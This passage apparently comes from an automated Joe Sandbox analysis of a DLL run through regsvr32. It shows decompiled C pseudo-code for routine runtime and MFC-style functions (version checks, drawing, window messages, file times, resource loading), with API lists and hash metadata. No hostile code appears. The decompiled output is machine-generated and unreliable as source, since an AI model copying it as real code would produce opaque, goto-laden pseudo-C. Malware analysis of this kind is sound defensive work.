                                                                                                            				_t50 = _t54->dwMinorVersion;
                                                                                                            				 *0x1004f3f0 = _t50;
                                                                                                            				_t56 = _t54->dwBuildNumber & 0x00007fff;
                                                                                                            				 *0x1004f3e4 = _t56;
                                                                                                            				if(_t47 != 2) {
                                                                                                            					 *0x1004f3e4 = _t56 | 0x00008000;
                                                                                                            				}
                                                                                                            				 *0x1004f3e8 = (_t25 << 8) + _t50;
                                                                                                            				if(E10013A83(1) != 0) {
                                                                                                            					if(E10015384() != 0) {
                                                                                                            						E1001678D(__eflags);
                                                                                                            						 *0x10050cb0 = GetCommandLineA();
                                                                                                            						 *0x1004f3cc = E1001666B();
                                                                                                            						_t33 = E1001614C();
                                                                                                            						__eflags = _t33;
                                                                                                            						if(_t33 < 0) {
                                                                                                            							L13:
                                                                                                            							E1001516D();
                                                                                                            							goto L6;
                                                                                                            						}
                                                                                                            						_t36 = E100165C9();
                                                                                                            						__eflags = _t36;
                                                                                                            						if(_t36 < 0) {
                                                                                                            							L12:
                                                                                                            							E1001634A();
                                                                                                            							goto L13;
                                                                                                            						}
                                                                                                            						_t38 = E10016396();
                                                                                                            						__eflags = _t38;
                                                                                                            						if(_t38 < 0) {
                                                                                                            							goto L12;
                                                                                                            						}
                                                                                                            						_t39 = E10011E29(0);
                                                                                                            						__eflags = _t39;
                                                                                                            						if(_t39 != 0) {
                                                                                                            							goto L12;
                                                                                                            						}
                                                                                                            						 *0x1004f3c8 =  *0x1004f3c8 + 1;
                                                                                                            						goto L27;
                                                                                                            					}
                                                                                                            					L6:
                                                                                                            					E10013AD4();
                                                                                                            				}
                                                                                                            			}

                                                                                                            0x100111e0
                                                                                                            0x100111e9
                                                                                                            0x100111f2
                                                                                                            0x100111f8
                                                                                                            0x10011200
                                                                                                            0x10011200
                                                                                                            0x1001120d
                                                                                                            0x1001121a
                                                                                                            0x10011227
                                                                                                            0x10011233
                                                                                                            0x1001123e
                                                                                                            0x10011248
                                                                                                            0x1001124d
                                                                                                            0x10011252
                                                                                                            0x10011254
                                                                                                            0x10011284
                                                                                                            0x10011284
                                                                                                            0x00000000
                                                                                                            0x10011284
                                                                                                            0x10011256
                                                                                                            0x1001125b
                                                                                                            0x1001125d
                                                                                                            0x1001127f
                                                                                                            0x1001127f
                                                                                                            0x00000000
                                                                                                            0x1001127f
                                                                                                            0x1001125f
                                                                                                            0x10011264
                                                                                                            0x10011266
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001126a
                                                                                                            0x1001126f
                                                                                                            0x10011272
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10011274
                                                                                                            0x00000000
                                                                                                            0x10011274
                                                                                                            0x10011229
                                                                                                            0x10011229
                                                                                                            0x10011229

                                                                                                            APIs
                                                                                                            • GetVersionExA.KERNEL32(?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 100111BE
                                                                                                            • GetCommandLineA.KERNEL32(?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10011238
                                                                                                              • Part of subcall function 1001666B: GetEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,10011248,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10016687
                                                                                                              • Part of subcall function 1001666B: GetEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,10011248,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 100166BD
                                                                                                              • Part of subcall function 1001666B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,10011248), ref: 100166F1
                                                                                                              • Part of subcall function 1001666B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,10011248,?,?), ref: 10016713
                                                                                                              • Part of subcall function 1001666B: FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,10011248,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 1001672C
                                                                                                              • Part of subcall function 1001382A: __lock.LIBCMT ref: 1001386E
                                                                                                              • Part of subcall function 1001382A: RtlAllocateHeap.NTDLL(00000008,?,10041E40,00000010,100151C5,00000001,0000008C,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000), ref: 100138AC
                                                                                                            • FlsSetValue.KERNEL32(00000000,?,?,10011379,?,?,?,10041D40,0000000C), ref: 100112DB
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 100112EC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: EnvironmentStrings$ByteCharMultiWide$AllocateCommandCurrentFreeHeapLineThreadValueVersion__lock
                                                                                                            • String ID:
                                                                                                            • API String ID: 770256606-0
                                                                                                            • Opcode ID: 0bbb6c4510ef70c4376c2f3441da33c3dbf9baf309990ecdfd17b149b5dc2492
                                                                                                            • Instruction ID: a119cf37508875902a7ac88b5959fce435ef45eee062e48075b7e26cf38889a7
                                                                                                            • Opcode Fuzzy Hash: 0bbb6c4510ef70c4376c2f3441da33c3dbf9baf309990ecdfd17b149b5dc2492
                                                                                                            • Instruction Fuzzy Hash: 7D31F635904312DBF728DFB08D8669A77E4EF05792F10412EF860CE552EB30EAC08B61
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 78%
                                                                                                            			E10030582(void* __ecx, void* __eflags, intOrPtr _a4) {
                                                                                                            				intOrPtr _v8;
                                                                                                            				intOrPtr _v12;
                                                                                                            				intOrPtr _v16;
                                                                                                            				intOrPtr _v20;
                                                                                                            				intOrPtr _v24;
                                                                                                            				struct tagRECT _v40;
                                                                                                            				void* __esi;
                                                                                                            				void* __ebp;
                                                                                                            				signed char _t60;
                                                                                                            				signed char _t65;
                                                                                                            				intOrPtr _t67;
                                                                                                            				signed int _t73;
                                                                                                            				void* _t76;
                                                                                                            				intOrPtr _t83;
                                                                                                            				void* _t91;
                                                                                                            
                                                                                                            				_t91 = __eflags;
                                                                                                            				_t76 = __ecx;
                                                                                                            				_v24 = 1;
                                                                                                            				_v20 = 1;
                                                                                                            				_push(GetStockObject(0));
                                                                                                            				_t83 = E1002934F();
                                                                                                            				_v16 = _t83;
                                                                                                            				_v8 = E10033F2F(_t83, _t91);
                                                                                                            				_t60 =  *(_t76 + 0x74);
                                                                                                            				_v12 = _t83;
                                                                                                            				if((0x0000a000 & _t60) == 0) {
                                                                                                            					__eflags = _t60 & 0x00000050;
                                                                                                            					if(__eflags == 0) {
                                                                                                            						_v24 = GetSystemMetrics(0x20) - 1;
                                                                                                            						_v20 = GetSystemMetrics(0x21) - 1;
                                                                                                            						_t65 =  *(_t76 + 0x78);
                                                                                                            						__eflags = 0x0000a000 & _t65;
                                                                                                            						if((0x0000a000 & _t65) == 0) {
                                                                                                            							L6:
                                                                                                            							__eflags = _t65 & 0x00000050;
                                                                                                            							if(__eflags == 0) {
                                                                                                            								L9:
                                                                                                            							} else {
                                                                                                            								__eflags =  *(_t76 + 0x7c);
                                                                                                            								if(__eflags == 0) {
                                                                                                            									goto L9;
                                                                                                            								} else {
                                                                                                            									goto L8;
                                                                                                            								}
                                                                                                            							}
                                                                                                            						} else {
                                                                                                            							__eflags =  *(_t76 + 0x7c);
                                                                                                            							if(__eflags != 0) {
                                                                                                            								goto L6;
                                                                                                            							}
                                                                                                            						}
                                                                                                            						_v12 = _v8;
                                                                                                            					} else {
                                                                                                            					}
                                                                                                            				} else {
                                                                                                            				}
                                                                                                            				asm("movsd");
                                                                                                            				asm("movsd");
                                                                                                            				asm("movsd");
                                                                                                            				asm("movsd");
                                                                                                            				if(_a4 != 0) {
                                                                                                            					_v20 = 0;
                                                                                                            					_v24 = 0;
                                                                                                            				}
                                                                                                            				if(( *(_t76 + 0x75) & 0x000000f0) != 0) {
                                                                                                            					InflateRect( &_v40, 0xffffffff, 0xffffffff);
                                                                                                            				}
                                                                                                            				_t95 =  *(_t76 + 0x24);
                                                                                                            				_t67 = _v8;
                                                                                                            				if( *(_t76 + 0x24) == 0) {
                                                                                                            					_t67 = _v16;
                                                                                                            				}
                                                                                                            				E10033FCE( *((intOrPtr*)(_t76 + 0x84)), _t95,  &_v40, _v24, _v20, _t76 + 0xc,  *((intOrPtr*)(_t76 + 0x1c)),  *((intOrPtr*)(_t76 + 0x20)), _v12, _t67);
                                                                                                            				asm("movsd");
                                                                                                            				 *((intOrPtr*)(_t76 + 0x1c)) = _v24;
                                                                                                            				asm("movsd");
                                                                                                            				 *((intOrPtr*)(_t76 + 0x20)) = _v20;
                                                                                                            				asm("movsd");
                                                                                                            				_t73 = 0 | _v12 == _v8;
                                                                                                            				asm("movsd");
                                                                                                            				 *(_t76 + 0x24) = _t73;
                                                                                                            				return _t73;
                                                                                                            			}


                                                                                                            APIs
                                                                                                            • GetStockObject.GDI32(00000000), ref: 10030598
                                                                                                              • Part of subcall function 10033F2F: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,100305AE), ref: 10033F73
                                                                                                              • Part of subcall function 10033F2F: CreatePatternBrush.GDI32(00000000), ref: 10033F80
                                                                                                              • Part of subcall function 10033F2F: DeleteObject.GDI32(00000000), ref: 10033F8C
                                                                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 1003062D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateObject$BitmapBrushDeleteInflatePatternRectStock
                                                                                                            • String ID:
                                                                                                            • API String ID: 3923860780-0
                                                                                                            • Opcode ID: a91736406a3bc21c34a15b15e2e7e71349b5931477c524aa32b1e52334f80afc
                                                                                                            • Instruction ID: 9af8668bb33911b9f969ea6b6b6f254ec0c1e141af5f513437efede38b15d734
                                                                                                            • Opcode Fuzzy Hash: a91736406a3bc21c34a15b15e2e7e71349b5931477c524aa32b1e52334f80afc
                                                                                                            • Instruction Fuzzy Hash: BF410371D016199FDF42CFA4C980A9EBBF5EB48351F1142A5E911AB29AD370AE41CF90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 94%
                                                                                                            			E1002084F(void* __ecx, struct HWND__** _a4) {
                                                                                                            				struct HWND__** _v8;
                                                                                                            				struct HWND__** _v12;
                                                                                                            				long _t31;
                                                                                                            				struct HWND__** _t32;
                                                                                                            				struct HWND__** _t44;
                                                                                                            				struct HWND__** _t45;
                                                                                                            				long _t47;
                                                                                                            				void* _t49;
                                                                                                            				struct HWND__** _t63;
                                                                                                            
                                                                                                            				_push(__ecx);
                                                                                                            				_push(__ecx);
                                                                                                            				_t49 = __ecx;
                                                                                                            				if( *((intOrPtr*)(__ecx + 0x48)) != 0) {
                                                                                                            					_t31 = _a4;
                                                                                                            					if(_t31 != 0) {
                                                                                                            						if( *((intOrPtr*)(_t31 + 8)) == 0) {
                                                                                                            							L4:
                                                                                                            							_t32 = E1001E0CB( *((intOrPtr*)(_t49 + 0x48)) + 0x3c, _t31, 0);
                                                                                                            							_v12 = _t32;
                                                                                                            							_a4 = _t32;
                                                                                                            							E10006D96( &_a4);
                                                                                                            							while(_a4 != 0) {
                                                                                                            								_t37 =  *((intOrPtr*)(E10006D96( &_a4)));
                                                                                                            								_v8 =  *((intOrPtr*)(E10006D96( &_a4)));
                                                                                                            								if((E1002049B(_t37) & 0x00020000) != 0) {
                                                                                                            									break;
                                                                                                            								} else {
                                                                                                            									_t45 = _v8;
                                                                                                            									if(_t45[2] == 0 || SendMessageA( *_t45, 0xf0, 0, 0) != 1) {
                                                                                                            										continue;
                                                                                                            									} else {
                                                                                                            										L16:
                                                                                                            										_t44 = _v8;
                                                                                                            										goto L17;
                                                                                                            									}
                                                                                                            								}
                                                                                                            								goto L18;
                                                                                                            							}
                                                                                                            							_a4 = _v12;
                                                                                                            							_t31 = E10006DAF( &_a4);
                                                                                                            							while(_a4 != 0) {
                                                                                                            								_t63 =  *(E10006DAF( &_a4));
                                                                                                            								_v8 = _t63;
                                                                                                            								if(_t63[2] == 0) {
                                                                                                            									L13:
                                                                                                            									_t31 = E1002049B(_t63);
                                                                                                            									if((_t31 & 0x00020000) == 0) {
                                                                                                            										continue;
                                                                                                            									}
                                                                                                            								} else {
                                                                                                            									if(SendMessageA( *_t63, 0xf0, 0, 0) == 1) {
                                                                                                            										goto L16;
                                                                                                            									} else {
                                                                                                            										_t63 = _v8;
                                                                                                            										goto L13;
                                                                                                            									}
                                                                                                            								}
                                                                                                            								goto L18;
                                                                                                            							}
                                                                                                            						} else {
                                                                                                            							_t47 = SendMessageA( *_t31, 0xf0, 0, 0);
                                                                                                            							_t44 = _a4;
                                                                                                            							if(_t47 == 1) {
                                                                                                            								L17:
                                                                                                            								_t31 = SendMessageA( *_t44, 0xf1, 0, 0);
                                                                                                            							} else {
                                                                                                            								goto L4;
                                                                                                            							}
                                                                                                            						}
                                                                                                            						L18:
                                                                                                            					}
                                                                                                            				}
                                                                                                            				return _t31;
                                                                                                            			}













                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 3850602802-0
                                                                                                            • Opcode ID: 710cd69c4ce831577703fdc87a40672e046194d5e9149a170122c71cdf11eb61
                                                                                                            • Instruction ID: 409e1e54ae5c96ed2e58890ddbbbae16c890d09ac2c6be6a3a2fbe05691f9f0c
                                                                                                            • Opcode Fuzzy Hash: 710cd69c4ce831577703fdc87a40672e046194d5e9149a170122c71cdf11eb61
                                                                                                            • Instruction Fuzzy Hash: 29315C30A00219EFDB15DF55D890EAE3BAAEF45390F50806AF54A9B213DA71ED80DB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10026B4F(void* __ecx, signed int* _a4) {
                                                                                                            				char _v12;
                                                                                                            				struct _FILETIME _v20;
                                                                                                            				struct _FILETIME _v28;
                                                                                                            				char _v36;
                                                                                                            				void* __ebx;
                                                                                                            				void* __edi;
                                                                                                            				void* _t43;
                                                                                                            				long _t48;
                                                                                                            				signed int* _t51;
                                                                                                            				signed int* _t54;
                                                                                                            				signed int* _t57;
                                                                                                            				struct _FILETIME* _t67;
                                                                                                            				void* _t81;
                                                                                                            				CHAR* _t82;
                                                                                                            				signed int* _t83;
                                                                                                            				void* _t86;
                                                                                                            
                                                                                                            				_t83 = _a4;
                                                                                                            				_t81 = __ecx;
                                                                                                            				E10011C50(_t83, 0, 0x128);
                                                                                                            				lstrcpynA( &(_t83[8]),  *(_t81 + 0xc), 0x104);
                                                                                                            				_t43 =  *(_t81 + 4);
                                                                                                            				_t86 = _t43 -  *0x100401d4; // 0xffffffff
                                                                                                            				if(_t86 == 0) {
                                                                                                            					L12:
                                                                                                            					return 1;
                                                                                                            				}
                                                                                                            				_t67 =  &_v12;
                                                                                                            				if(GetFileTime(_t43, _t67,  &_v20,  &_v28) == 0) {
                                                                                                            					L4:
                                                                                                            					return 0;
                                                                                                            				}
                                                                                                            				_t48 = GetFileSize( *(_t81 + 4), 0);
                                                                                                            				_t83[6] = _t48;
                                                                                                            				_t83[7] = 0;
                                                                                                            				if(_t48 != 0xffffffff || 0 != 0) {
                                                                                                            					_t82 =  *(_t81 + 0xc);
                                                                                                            					if( *((intOrPtr*)(_t82 - 0xc)) != 0) {
                                                                                                            						_t83[8] = (_t67 & 0xffffff00 | GetFileAttributesA(_t82) == 0xffffffff) - 0x00000001 & _t49;
                                                                                                            					} else {
                                                                                                            						_t83[8] = 0;
                                                                                                            					}
                                                                                                            					_t51 = E10010239(0,  &_v36, _t82,  &_v12, 0xffffffff);
                                                                                                            					 *_t83 =  *_t51;
                                                                                                            					_t83[1] = _t51[1];
                                                                                                            					_t54 = E10010239(0,  &_v36, _t82,  &_v20, 0xffffffff);
                                                                                                            					_t83[4] =  *_t54;
                                                                                                            					_t83[5] = _t54[1];
                                                                                                            					_t57 = E10010239(0,  &_v36, _t82,  &_v28, 0xffffffff);
                                                                                                            					_t83[2] =  *_t57;
                                                                                                            					_t83[3] = _t57[1];
                                                                                                            					if(( *_t83 | _t83[1]) == 0) {
                                                                                                            						 *_t83 =  *_t57;
                                                                                                            						_t83[1] = _t57[1];
                                                                                                            					}
                                                                                                            					if((_t83[4] | _t83[5]) == 0) {
                                                                                                            						_t83[4] = _t83[2];
                                                                                                            						_t83[5] = _t83[3];
                                                                                                            					}
                                                                                                            					goto L12;
                                                                                                            				} else {
                                                                                                            					goto L4;
                                                                                                            				}
                                                                                                            			}

                                                                                                            APIs
                                                                                                            • lstrcpynA.KERNEL32(?,?,00000104), ref: 10026B7A
                                                                                                            • GetFileTime.KERNEL32(?,?,?,?), ref: 10026B9C
                                                                                                            • GetFileSize.KERNEL32(?,00000000), ref: 10026BAA
                                                                                                            • GetFileAttributesA.KERNEL32(?), ref: 10026BD4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$AttributesSizeTimelstrcpyn
                                                                                                            • String ID:
                                                                                                            • API String ID: 1499663573-0
                                                                                                            • Opcode ID: 264b54ed5d3c1a5871a5bc4a1410a4c0aead81c30cddf2f294e70723d2439856
                                                                                                            • Instruction ID: a18b0f555d231170b7735eacb595d982f5b9ad02e146dd108c4f4c0e1a6c5240
                                                                                                            • Opcode Fuzzy Hash: 264b54ed5d3c1a5871a5bc4a1410a4c0aead81c30cddf2f294e70723d2439856
                                                                                                            • Instruction Fuzzy Hash: 06419CB56006059FC724DFA4DD84CAABBF8FF093103508A2EE1A6D76A0E730F944CB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 29%
                                                                                                            			E1000C29A(void* _a4, intOrPtr _a8) {
                                                                                                            				char _v8;
                                                                                                            				char _v24;
                                                                                                            				intOrPtr _v28;
                                                                                                            				intOrPtr _v32;
                                                                                                            				intOrPtr _v36;
                                                                                                            				intOrPtr _v44;
                                                                                                            				intOrPtr _v48;
                                                                                                            				intOrPtr _v52;
                                                                                                            				char _v56;
                                                                                                            				char _v60;
                                                                                                            				intOrPtr _t39;
                                                                                                            				intOrPtr* _t41;
                                                                                                            				intOrPtr* _t47;
                                                                                                            				intOrPtr _t48;
                                                                                                            				intOrPtr* _t49;
                                                                                                            				intOrPtr _t58;
                                                                                                            				intOrPtr* _t60;
                                                                                                            				void* _t71;
                                                                                                            
                                                                                                            				_t71 = _a4 + 0xffffff2c;
                                                                                                            				if( *((intOrPtr*)(_t71 + 0x84)) != 0) {
                                                                                                            					return 0;
                                                                                                            				}
                                                                                                            				_t58 = _a8;
                                                                                                            				if( *((intOrPtr*)(_t71 + 0x8c)) != 0) {
                                                                                                            					L4:
                                                                                                            					if( *((intOrPtr*)(_t71 + 0x98)) == _t58) {
                                                                                                            						__imp__#9(_t71 + 0xa8);
                                                                                                            						_t41 =  *((intOrPtr*)(_t71 + 0x4c));
                                                                                                            						_push( &_a4);
                                                                                                            						_push(0x10043098);
                                                                                                            						_a4 = 0;
                                                                                                            						_push(_t41);
                                                                                                            						if( *((intOrPtr*)( *_t41))() >= 0) {
                                                                                                            							E10011C50( &_v56, 0, 0x20);
                                                                                                            							E10011C50( &_v24, 0, 0x10);
                                                                                                            							_t47 = _a4;
                                                                                                            							_t48 =  *((intOrPtr*)( *_t47 + 0x18))(_t47, _t58, 0x10043018, 0, 2,  &_v24, _t71 + 0xa8,  &_v56,  &_v8);
                                                                                                            							_t60 = __imp__#6;
                                                                                                            							_a8 = _t48;
                                                                                                            							if(_v52 != 0) {
                                                                                                            								 *_t60(_v52);
                                                                                                            							}
                                                                                                            							if(_v48 != 0) {
                                                                                                            								 *_t60(_v48);
                                                                                                            							}
                                                                                                            							if(_v44 != 0) {
                                                                                                            								 *_t60(_v44);
                                                                                                            							}
                                                                                                            							_t49 = _a4;
                                                                                                            							 *((intOrPtr*)( *_t49 + 8))(_t49);
                                                                                                            							if(_a8 >= 0) {
                                                                                                            								 *((intOrPtr*)(_t71 + 0xa4)) = 1;
                                                                                                            							}
                                                                                                            						}
                                                                                                            					}
                                                                                                            					_t39 = 0;
                                                                                                            					goto L15;
                                                                                                            				} else {
                                                                                                            					_v60 = 2;
                                                                                                            					_v56 = _t58;
                                                                                                            					_v52 = 0;
                                                                                                            					_v48 = 0;
                                                                                                            					_v44 = 0;
                                                                                                            					_v36 = 0;
                                                                                                            					_v32 = 0;
                                                                                                            					_v28 = 0;
                                                                                                            					E1000A823(_t71,  &_v60);
                                                                                                            					_t39 = _v36;
                                                                                                            					if(_t39 != 0) {
                                                                                                            						L15:
                                                                                                            						return _t39;
                                                                                                            					}
                                                                                                            					goto L4;
                                                                                                            				}
                                                                                                            			}

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FreeString$ClearVariant
                                                                                                            • String ID:
                                                                                                            • API String ID: 3349467263-0
                                                                                                            • Opcode ID: 59934ff8b0a33592fc684abeea173d1cbe41f05f72404a74ff9e24727756a326
                                                                                                            • Instruction ID: 552477abdee19e13ea1b462c0c8e49e77f6f834a68e9ea303e894a8b6247ec6d
                                                                                                            • Opcode Fuzzy Hash: 59934ff8b0a33592fc684abeea173d1cbe41f05f72404a74ff9e24727756a326
                                                                                                            • Instruction Fuzzy Hash: E3310571A10229BFDB04DFA5C884EDEBBB9FF08790F10811AF559A6245C770AA54CFA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 87%
                                                                                                            			E10036A6D(intOrPtr __ecx, CHAR* _a4) {
                                                                                                            				intOrPtr _v8;
                                                                                                            				void* _v12;
                                                                                                            				void* __ebx;
                                                                                                            				void* __edi;
                                                                                                            				void* __esi;
                                                                                                            				void* __ebp;
                                                                                                            				struct HRSRC__* _t22;
                                                                                                            				signed short _t23;
                                                                                                            				void* _t24;
                                                                                                            				signed int _t29;
                                                                                                            				signed short _t31;
                                                                                                            				void* _t37;
                                                                                                            				signed short _t38;
                                                                                                            				signed short* _t47;
                                                                                                            				void* _t53;
                                                                                                            				struct HINSTANCE__* _t56;
                                                                                                            				void* _t58;
                                                                                                            
                                                                                                            				_push(__ecx);
                                                                                                            				_push(__ecx);
                                                                                                            				_v8 = __ecx;
                                                                                                            				_t56 =  *(E100373B5() + 0xc);
                                                                                                            				_t22 = FindResourceA(_t56, _a4, 0xf1);
                                                                                                            				if(_t22 == 0) {
                                                                                                            					L3:
                                                                                                            					_t23 = 0;
                                                                                                            				} else {
                                                                                                            					_t24 = LoadResource(_t56, _t22);
                                                                                                            					_v12 = _t24;
                                                                                                            					if(_t24 == 0) {
                                                                                                            						goto L3;
                                                                                                            					} else {
                                                                                                            						_t58 = LockResource(_t24);
                                                                                                            						if(_t58 != 0) {
                                                                                                            							_push(_t37);
                                                                                                            							_t53 = E1001F77E(( *(_t58 + 6) & 0x0000ffff) << 2);
                                                                                                            							_t29 = 0;
                                                                                                            							__eflags =  *(_t58 + 6);
                                                                                                            							if( *(_t58 + 6) > 0) {
                                                                                                            								_t7 = _t58 + 8; // 0x8
                                                                                                            								_t47 = _t7;
                                                                                                            								do {
                                                                                                            									 *(_t53 + _t29 * 4) =  *_t47 & 0x0000ffff;
                                                                                                            									_t29 = _t29 + 1;
                                                                                                            									_t47 =  &(_t47[1]);
                                                                                                            									__eflags = _t29 - ( *(_t58 + 6) & 0x0000ffff);
                                                                                                            								} while (_t29 < ( *(_t58 + 6) & 0x0000ffff));
                                                                                                            							}
                                                                                                            							_t31 = E100366B1(_t37, _v8, _t53, _t58, _t53,  *(_t58 + 6) & 0x0000ffff);
                                                                                                            							_push(_t53);
                                                                                                            							_t38 = _t31;
                                                                                                            							L1001F7A9(_t38, _t53, _t58, __eflags);
                                                                                                            							__eflags = _t38;
                                                                                                            							if(_t38 != 0) {
                                                                                                            								_t44 =  *(_t58 + 4) & 0x0000ffff;
                                                                                                            								E100368F3(_v8, ( *(_t58 + 2) & 0x0000ffff) + 7, ( *(_t58 + 4) & 0x0000ffff) + 7,  *(_t58 + 2) & 0x0000ffff, _t44);
                                                                                                            								_t38 = E1003697A(_v8, _a4);
                                                                                                            							}
                                                                                                            							FreeResource(_v12);
                                                                                                            							_t23 = _t38;
                                                                                                            						} else {
                                                                                                            							goto L3;
                                                                                                            						}
                                                                                                            					}
                                                                                                            				}
                                                                                                            				return _t23;
                                                                                                            			}





















                                                                                                            APIs
                                                                                                            • FindResourceA.KERNEL32(?,?,000000F1), ref: 10036A87
                                                                                                            • LoadResource.KERNEL32(?,00000000), ref: 10036A93
                                                                                                            • LockResource.KERNEL32(00000000), ref: 10036AA1
                                                                                                            • FreeResource.KERNEL32(?), ref: 10036B24
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Resource$FindFreeLoadLock
                                                                                                            • String ID:
                                                                                                            • API String ID: 1078018258-0
                                                                                                            • Opcode ID: 44134f55a48ede10767db44c9c427e80920c35ed83f2e6bdb24110360ef5ff70
                                                                                                            • Instruction ID: 90f7a23fa8f058c3dd6ac9528b305ebca7cc9ac8441aa778f718171523645421
